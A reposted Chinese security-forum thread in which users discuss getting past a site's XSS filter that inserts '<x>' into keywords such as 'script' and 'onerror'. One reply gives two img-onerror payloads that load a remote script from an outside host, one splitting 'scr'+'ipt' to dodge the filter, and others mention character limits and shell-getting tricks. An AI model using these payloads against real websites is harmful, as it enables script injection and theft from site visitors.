安云网 - AnYun.ORG | 专注于网络信息收集、网络数据分享、网络安全研究、网络各种猎奇八卦。
当前位置: 安云网 > 技术关注 > WEB安全 > script 变成sc<x>ript,还有javascript onload onmouseover 基本都是加入捣蛋的<x>

script 变成sc<x>ript,还有javascript onload onmouseover 基本都是加入捣蛋的<x>

时间:2014-08-11来源:WOOYUN 作者:醉入红尘梦点击:
script 变成script,还有javascript onload onmouseover 基本都是加入捣蛋的

script 变成sc<x>ript,还有javascript onload onmouseover 基本都是加入捣蛋的<x> 
我在想,之前ewebeditor,style样式添加,asaspp来拿shell。那么这个<x>,可不可以也这样绕过呢。对了String.fromCharCode(47,120,115,115,46,114,101,47,54,5)里的数字会自动去掉,变成String.fromCharCode(471201151154611410147545)。URI编码也照样解析后加入<x>. 

//安云网咨询系统



总之我这几个小时一直研究,被<x>弄疯了。各位大牛,能给下思路吗?
//copyright AnYun.ORG

//安云网咨询系统

1#醉入红尘梦 | 2013-12-15 02:10 //安云网咨询系统

已经搞定 //安云网咨询系统

  //内容来自安云网

2#blast | 2013-12-15 02:14 //安云网,anyun.org

网易么。。记得网易有个手机站就是这么风骚。。

//本文来自安云网

  //copyright AnYun.ORG

3#核攻击 | 2013-12-15 09:51

//本文来自安云网

大小写、编码、回车换行字符 //ANYUN.ORG

 

//安云网,anyun.org

4#H.Shao | 2013-12-15 14:34

//copyright AnYun.ORG

@醉入红尘梦 求搞定方法。技术交流 //安云网,anyun.org

 

//安云网,anyun.org

5#1ee | 2013-12-15 16:39

//ANYUN.ORG

@醉入红尘梦 同求搞定方法

//内容来自安云网

 

//本文来自安云网

6#醉入红尘梦 | 2013-12-15 21:50 //copyright AnYun.ORG

@核攻击 核总威武。顺便问下怎么加载js //内容来自AnYun.ORG

 

//ANYUN.ORG

7#D&G | 2013-12-16 09:24

//ANYUN.ORG

@醉入红尘梦 搞定了不分享么 //安云网咨询系统

 

//内容来自安云网

8#Oops | 2013-12-16 10:55 //copyright AnYun.ORG

2013-12-15 00:47---------->>2013-12-15 02:10

//ANYUN.ORG

LZ搞了83分钟搞好了,为什么不分享! //ANYUN.ORG

自娱自乐啊,自问自答啊! //内容来自安云网

 

//ANYUN.ORG

9#核攻击 | 2013-12-16 10:59 //copyright AnYun.ORG

@醉入红尘梦  //内容来自安云网


//本文来自安云网

<img src=# onerror=javascript:document.write('<scr'+'ipt src=\'http://lcx.cc/1.js\'></scr'+'ipt>')></img>

//安云网,anyun.org

<img src=# onerror=javascript:window.s=document.createElement('script');window.s.src='http://lcx.cc/1.js';document.body.appendChild(window.s);></img> //内容来自安云网

 

//copyright AnYun.ORG

10#醉入红尘梦 | 2013-12-16 20:41

//内容来自AnYun.ORG

@Oops @1ee @H.Shao @D&G @核攻击 就是核总这个代码。但是核总,字符限制到60个。而且onerror也添加?<x>,发现+都过滤。。

//安云网,anyun.org

 

//安云网咨询系统

11#猫头鹰 | 2013-12-17 08:41

//安云网咨询系统

我是不会告诉你我也遇到这个问题的~妈的恶心死了 //内容来自安云网

  //本文来自安云网

12#Manning | 2013-12-20 14:47 //ANYUN.ORG

前端限制字符,不一定服务器端限制字符数目啊 //ANYUN.ORG

 

//内容来自安云网

13#猫头鹰 | 2014-03-24 18:14

//本文来自安云网

楼主你得绕过在哪里

//内容来自AnYun.ORG

 

//安云网咨询系统

14#Airbasic | 2014-03-25 11:03 //安云网,anyun.org

楼主求细节啊

//安云网咨询系统

  //安云网咨询系统

15#我来找快乐 | 2014-03-25 11:52

//本文来自安云网

LZ不厚道,自己过了就不发细节 //copyright AnYun.ORG



//安云网,anyun.org

顶一下
(0)
0%
踩一下
(1)
100%
------分隔线----------------------------
发表评论
请自觉遵守互联网相关的政策法规,严禁发布色情、暴力、反动的言论。
评价:
验证码: 点击我更换图片
相关内容
推荐内容